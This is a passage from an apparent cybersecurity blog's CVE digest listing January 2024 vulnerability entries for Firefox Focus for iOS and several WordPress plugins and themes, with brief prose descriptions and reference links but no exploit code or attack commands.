First published on : 22-01-2024 18:15:19
Last modified on : 22-01-2024 18:15:19

Description :
Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.

CVE ID : CVE-2022-45795
Source : ot-cert@dragos.com
CVSS Score : /

References :


Source : mozilla.org

Vulnerability ID : CVE-2024-0605

First published on : 22-01-2024 19:15:09
Last modified on : 22-01-2024 20:28:17

Description :
Using a javascript: URI with a setTimeout race condition, an attacker can execute unauthorized scripts on top origin sites in urlbar. This bypasses security measures, potentially leading to arbitrary code execution or unauthorized actions within the user's loaded webpage. This vulnerability affects Focus for iOS < 122.

CVE ID : CVE-2024-0605
Source : security@mozilla.org
CVSS Score : /

References :
https://bugzilla.mozilla.org/show_bug.cgi?id=1855575 | source : security@mozilla.org
https://www.mozilla.org/security/advisories/mfsa2024-03/ | source : security@mozilla.org


Vulnerability ID : CVE-2024-0606

First published on : 22-01-2024 19:15:09
Last modified on : 22-01-2024 20:28:17

Description :
An attacker could execute unauthorized script on a legitimate site through UXSS using window.open() by opening a javascript URI leading to unauthorized actions within the user's loaded webpage. This vulnerability affects Focus for iOS < 122.

CVE ID : CVE-2024-0606
Source : security@mozilla.org
CVSS Score : /

References :
https://bugzilla.mozilla.org/show_bug.cgi?id=1855030 | source : security@mozilla.org
https://www.mozilla.org/security/advisories/mfsa2024-03/ | source : security@mozilla.org


Source : wpscan.com

Vulnerability ID : CVE-2023-6290

First published on : 22-01-2024 20:15:47
Last modified on : 22-01-2024 20:28:17

Description :
The SEOPress WordPress plugin before 7.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed

CVE ID : CVE-2023-6290
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/78a13958-cd12-4ea8-b326-1e3184da970b/ | source : contact@wpscan.com


Vulnerability ID : CVE-2023-6384

First published on : 22-01-2024 20:15:47
Last modified on : 22-01-2024 20:28:17

Description :
The WP User Profile Avatar WordPress plugin before 1.0.1 does not properly check for authorisation, allowing authors to delete and update arbitrary avatar

CVE ID : CVE-2023-6384
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/fbdefab4-614b-493b-a9ae-c5aeff8323ef/ | source : contact@wpscan.com


Vulnerability ID : CVE-2023-6447

First published on : 22-01-2024 20:15:47
Last modified on : 22-01-2024 20:28:17

Description :
The EventPrime WordPress plugin before 3.3.6 lacks authentication and authorization, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id/event name.

CVE ID : CVE-2023-6447
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/e366881c-d21e-4063-a945-95e6b080a373/ | source : contact@wpscan.com


Vulnerability ID : CVE-2023-6456

First published on : 22-01-2024 20:15:47
Last modified on : 22-01-2024 20:28:17

Description :
The WP Review Slider WordPress plugin before 13.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

CVE ID : CVE-2023-6456
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/30f31412-8f94-4d5e-a080-3f6f669703cd/ | source : contact@wpscan.com


Vulnerability ID : CVE-2023-6625

First published on : 22-01-2024 20:15:47
Last modified on : 22-01-2024 20:28:17

Description :
The Product Enquiry for WooCommerce WordPress plugin before 3.1 does not have a CSRF check in place when deleting inquiries, which could allow attackers to make a logged in admin delete them via a CSRF attack

CVE ID : CVE-2023-6625
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/d483f7ce-cb3f-4fcb-b060-005cec0ea10f/ | source : contact@wpscan.com


Vulnerability ID : CVE-2023-6626

First published on : 22-01-2024 20:15:47
Last modified on : 22-01-2024 20:28:17

Description :
The Product Enquiry for WooCommerce WordPress plugin before 3.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

CVE ID : CVE-2023-6626
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/327ae124-79eb-4e07-b029-e4f543cbd356/ | source : contact@wpscan.com


Vulnerability ID : CVE-2023-7082

First published on : 22-01-2024 20:15:47
Last modified on : 22-01-2024 20:28:17

Description :
The Import any XML or CSV File to WordPress plugin before 3.7.3 accepts all zip files and automatically extracts the zip file into a publicly accessible directory without sufficiently validating the extracted file type. This may allows high privilege users such as administrator to upload an executable file type leading to remote code execution.

CVE ID : CVE-2023-7082
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/7f947305-7a72-4c59-9ae8-193f437fd04e/ | source : contact@wpscan.com


Vulnerability ID : CVE-2023-7170

First published on : 22-01-2024 20:15:47
Last modified on : 22-01-2024 20:28:17

Description :
The EventON-RSVP WordPress plugin before 2.9.5 does not sanitise and escape some parameters before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

CVE ID : CVE-2023-7170
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/218fb3af-3a40-486f-8ea9-80211a986fb3/ | source : contact@wpscan.com


Vulnerability ID : CVE-2023-7194

First published on : 22-01-2024 20:15:47
Last modified on : 22-01-2024 20:28:17

Description :
The Meris WordPress theme through 1.1.2 does not sanitise and escape some parameters before outputting them back in the page, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin

CVE ID : CVE-2023-7194
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/e20292af-939a-4cb1-91e4-5ff6aa0c7fbe | source : contact@wpscan.com


This website uses the NVD API, but is not approved or certified by it.

About the author
Julien B.

Securitricks

Up-to-Date Cybersecurity Insights & Malware Reports

Securitricks

Great! You’ve successfully signed up.

Welcome back! You've successfully signed in.

You've successfully subscribed to Securitricks.

Success! Check your email for magic link to sign-in.

Success! Your billing info has been updated.

Your billing was not updated.